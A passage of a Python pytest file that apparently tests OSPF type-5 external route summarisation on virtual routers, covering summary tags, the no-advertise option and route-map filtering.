ospf_covergence
)
step(
"Configure 5 static routes from the same network on R0"
"5 static routes from different networks and redistribute in R0"
)
input_dict_static_rtes = {
"r0": {
"static_routes": [
{"network": NETWORK["ipv4"], "next_hop": "blackhole"},
{"network": NETWORK2["ipv4"], "next_hop": "blackhole"},
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
dut = "r0"
red_static(dut)
step("Verify that routes are learnt on R1.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step(
"Configure External Route summary in R0 to summarise 5" " routes to one route."
)
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"tag": "1234",
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes are summarised to configured summary"
" address on R0 and only one route is sent to R1 with configured tag."
)
input_dict_summary = {
"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0], "tag": "1234"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that show ip ospf summary should show the summaries with tag.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 1234,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Delete the configured summary")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"delete": True,
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify that summary lsa is withdrawn from R1 and deleted from R0.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Summary Route still present in RIB".format(
tc_name
)
step("show ip ospf summary should not have any summary address.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 1234,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict, expected=False)
assert (
result is not True
), "Testcase {} : Failed" "Error: Summary still present in DB".format(tc_name)
step("Configure Min tag value")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8", "tag": 1}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
input_dict_summary = {
"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0], "tag": "1"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that show ip ospf summary should show the summaries with tag.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 1,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Configure Max Tag Value")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"tag": 4294967295,
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
input_dict_summary = {
"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0], "tag": "4294967295"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step(
"Verify that boundary values tags are used for summary route"
" using show ip ospf route command."
)
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 4294967295,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("configure new static route with different tag.")
input_dict_static_rtes_11 = {
"r0": {
"static_routes": [
{"network": NETWORK_11["ipv4"], "next_hop": "blackhole", "tag": "88888"}
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes_11)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("New tag has not been used by summary address.")
input_dict_summary = {
"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0], "tag": "88888"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary, tag="88888", expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen,
"ipv4",
dut,
input_dict_summary,
protocol=protocol,
tag="88888",
expected=False,
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes still present in RIB".format(tc_name)
step(
"Verify that boundary values tags are used for summary route"
" using show ip ospf route command."
)
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 88888,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict, expected=False)
assert (
result is not True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Delete the configured summary address")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"tag": 4294967295,
"delete": True,
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that 6 routes are advertised to neighbour with 5 routes"
" without any tag, 1 route with tag."
)
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that summary address is flushed from neighbor.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes still present in RIB".format(tc_name)
step("Configure summary first & then configure matching static route.")
input_dict_static_rtes = {
"r0": {
"static_routes": [
{"network": NETWORK["ipv4"], "next_hop": "blackhole", "delete": True},
{"network": NETWORK2["ipv4"], "next_hop": "blackhole", "delete": True},
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8"}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
input_dict_static_rtes = {
"r0": {
"static_routes": [
{"network": NETWORK["ipv4"], "next_hop": "blackhole"},
{"network": NETWORK2["ipv4"], "next_hop": "blackhole"},
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
write_test_footer(tc_name)
def test_ospf_type5_summary_tc46_p0(request):
"""OSPF summarisation with advertise and no advertise option"""
tc_name = request.node.name
write_test_header(tc_name)
tgen = get_topogen()
# Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
global topo
step("Bring up the base config as per the topology")
step("Configure OSPF on all the routers of the topology.")
reset_config_on_routers(tgen)
protocol = "ospf"
step(
"Configure 5 static routes from the same network on R0"
"5 static routes from different networks and redistribute in R0"
)
input_dict_static_rtes = {
"r0": {
"static_routes": [
{"network": NETWORK["ipv4"], "next_hop": "blackhole"},
{"network": NETWORK2["ipv4"], "next_hop": "blackhole"},
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
dut = "r0"
red_static(dut)
step("Verify that routes are learnt on R1.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step(
"Configure External Route summary in R0 to summarise 5"
" routes to one route with no advertise option."
)
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"advertise": False,
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes are summarised to configured summary"
" address on R0 and summary route is not advertised to neighbor as"
" no advertise is configured.."
)
input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes still present in RIB".format(tc_name)
step("Verify that show ip ospf summary should show the " "configured summaries.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Delete the configured summary")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"delete": True,
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Summary has 5 sec delay timer, sleep 5 secs...")
sleep(5)
step("Verify that summary lsa is withdrawn from R1 and deleted from R0.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Summary Route still present in RIB".format(
tc_name
)
step("show ip ospf summary should not have any summary address.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 1234,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict, expected=False)
assert (
result is not True
), "Testcase {} : Failed" "Error: Summary still present in DB".format(tc_name)
step("Reconfigure summary with no advertise.")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"advertise": False,
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes are summarised to configured summary"
" address on R0 and summary route is not advertised to neighbor as"
" no advertise is configured.."
)
input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes still present in RIB".format(tc_name)
step("Verify that show ip ospf summary should show the " "configured summaries.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step(
"Change summary address from no advertise to advertise "
"(summary-address 10.0.0.0 255.255.0.0)"
)
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"advertise": False,
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8"}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes are summarised to configured summary "
"address on R0 after 5 secs of delay timer expiry and only one "
"route is sent to R1."
)
input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that show ip ospf summary should show the summaries.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Verify that originally advertised routes are withdraw from there" " peer.")
input_dict = {
"r0": {"static_routes": [{"network": NETWORK["ipv4"], "next_hop": "blackhole"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes is present in RIB".format(tc_name)
write_test_footer(tc_name)
def test_ospf_type5_summary_tc47_p0(request):
"""OSPF summarisation with route map filtering."""
tc_name = request.node.name
write_test_header(tc_name)
tgen = get_topogen()
# Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
global topo
step("Bring up the base config as per the topology")
reset_config_on_routers(tgen)
protocol = "ospf"
step(
"Configure 5 static routes from the same network on R0"
"5 static routes from different networks and redistribute in R0"
)
input_dict_static_rtes = {
"r0": {
"static_routes": [
{"network": NETWORK["ipv4"], "next_hop": "blackhole"},
{"network": NETWORK2["ipv4"], "next_hop": "blackhole"},
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
dut = "r0"
red_static(dut)
step("Verify that routes are learnt on R1.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step(
"Configure External Route summary in R0 to summarise 5" " routes to one route."
)
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8"}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes are summarised to configured summary "
"address on R0 after 5 secs of delay timer expiry and only one "
"route is sent to R1."
)
input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that show ip ospf summary should show the summaries.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Verify that originally advertised routes are withdraw from there" " peer.")
input_dict = {
"r0": {"static_routes": [{"network": NETWORK["ipv4"], "next_hop": "blackhole"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes still present in RIB".format(tc_name)
step(
"configure route map and add rule to permit configured static "
"routes, redistribute static & connected routes with the route map."
)
# Create ip prefix list
pfx_list = {
"r0": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
}
}
}
}
result = create_prefix_lists(tgen, pfx_list)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
routemaps = {
"r0": {
"route_maps": {
"rmap_ipv4": [
{
"action": "permit",
"match": {"ipv4": {"prefix_lists": "pf_list_1_ipv4"}},
"seq_id": 10,
}
]
}
}
}
result = create_route_maps(tgen, routemaps)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
ospf_red_r1 = {
"r0": {
"ospf": {
"redistribute": [{"redist_type": "static", "route_map": "rmap_ipv4"}]
}
}
}
result = create_router_ospf(tgen, topo, ospf_red_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes are summarised to configured"
"summary address on R0 and only one route is sent to R1. Verify that "
"show ip ospf summary should show the configure summaries."
)
input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Change the rule from permit to deny in configured route map.")
routemaps = {
"r0": {
"route_maps": {
"rmap_ipv4": [
{
"action": "deny",
"match": {"ipv4": {"prefix_lists": "pf_list_1_ipv4"}},
"seq_id": 10,
}
]
}
}
}
result = create_route_maps(tgen, routemaps)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("summary route has 5 secs dealy, sleep 5 secs")
sleep(5)
step("Verify that advertised summary route is flushed from neighbor.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes still present in RIB".format(tc_name)
step("Delete the configured route map.")
routemaps = {
"r0": {
"route_maps": {
"rmap_ipv4": [
{
"action": "permit",
"match": {"ipv4": {"prefix_lists": "pf_list_1_ipv4"}},
"delete": True,
}
]
}
}
}
result = create_route_maps(tgen, routemaps)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
ospf_red_r1 = {"r0": {"ospf": {"redistribute": [{"redist_type": "static"}]}}}
result = create_router_ospf(tgen, topo, ospf_red_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes are summarised to configured"
"summary address on R0 and only one route is sent to R1. Verify that "
"show ip ospf summary should show the configure summaries."
)
input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Reconfigure the route map with denying configure summary address.")
routemaps = {
"r0": {
"route_maps": {
"rmap_ipv4": [
{
"action": "permit",
"match": {"ipv4": {"prefix_lists": "pf_list_1_ipv4"}},
"seq_id": 10,
}
]
}
}
}
result = create_route_maps(tgen, routemaps)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create ip prefix list
pfx_list = {
"r0": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": SUMMARY["ipv4"][0], "action": "deny"}
]
}
}
}
}
result = create_prefix_lists(tgen, pfx_list)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify that advertised summary route is not flushed from neighbor.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Redistribute static/connected routes without route map.")
routemaps = {
"r0": {
"route_maps": {
"rmap_ipv4": [
{
"action": "permit",
"match": {"ipv4": {"prefix_lists": "pf_list_1_ipv4"}},
"seq_id": 10,
"delete": True,
}
]
}
}
}
result = create_route_maps(tgen, routemaps)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes are summarised to configured"
"summary address on R0 and only one route is sent to R1. Verify that "
"show ip ospf summary should show the configure summaries."
)
input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step(
"Configure rule to deny all the routes in route map and configure"
" redistribute command in ospf using route map."
)
# Create ip prefix list
pfx_list = {
"r0": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "deny"}
]
}
}
}
}
result = create_prefix_lists(tgen, pfx_list)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
routemaps = {
"r0": {
"route_maps": {
"rmap_ipv4": [
{
"action": "permit",
"match": {"ipv4": {"prefix_lists": "pf_list_1_ipv4"}},
"seq_id": 10,
}
]
}
}
}
result = create_route_maps(tgen, routemaps)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
ospf_red_r1 = {
"r0": {
"ospf": {
"redistribute": [{"redist_type": "static", "route_map": "rmap_ipv4"}]
}
}
}
result = create_router_ospf(tgen, topo, ospf_red_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify that no summary route is originated.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes still present in RIB".format(tc_name)
routemaps = {
"r0": {
"route_maps": {
"rmap_ipv4": [
{
"action": "permit",
"match": {"ipv4": {"prefix_lists": "pf_list_1_ipv4"}},
"seq_id": 10,
"delete": True,
}
]
}
}
}
result = create_route_maps(tgen, routemaps)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Configure cli in this order - 2 static routes, a route map to "
"permit those routes, summary address in ospf to match the "
"configured static route network, redistribute the static "
"routes with route map"
)
input_dict_static_rtes = {
"r0": {
"static_routes": [{"network": NETWORK2["ipv4"], "next_hop": "blackhole"}]
}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
routemaps = {
"r0": {
"route_maps": {
"rmap_ipv4": [
{
"action": "permit",
"match": {"ipv4": {"prefix_lists": "pf_list_1_ipv4"}},
}
]
}
}
}
result = create_route_maps(tgen, routemaps)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{"prefix": SUMMARY["ipv4"][1].split("/")[0], "mask": "8"}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create ip prefix list
pfx_list = {
"r0": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
}
}
}
}
result = create_prefix_lists(tgen, pfx_list)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes are summarised to configured summary "
"address on R0 after 5 secs of delay timer expiry and only one "
"route is sent to R1."
)
input_dict_summary = {"r0": {"static_routes": [{"network": "12.0.0.0/8"}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that show ip ospf summary should show the summaries.")
input_dict = {
"12.0.0.0/8": {
"Summary address": "12.0.0.0/8",
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Change route map rule for 1 of the routes to deny.")
# Create ip prefix list
pfx_list = {
"r0": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": NETWORK2["ipv4"][0], "action": "deny"},
{"seqid": 20, "network": "any", "action": "permit"},
]
}
}
}
}
result = create_prefix_lists(tgen, pfx_list)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that originated type 5 summary lsa is not refreshed because"
"of the route map events."
)
input_dict_summary = {"r0": {"static_routes": [{"network": "12.0.0.0/8"}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("add rule in route map to deny configured summary address.")
# Create ip prefix list
pfx_list = {
"r0": {
"prefix_lists": {
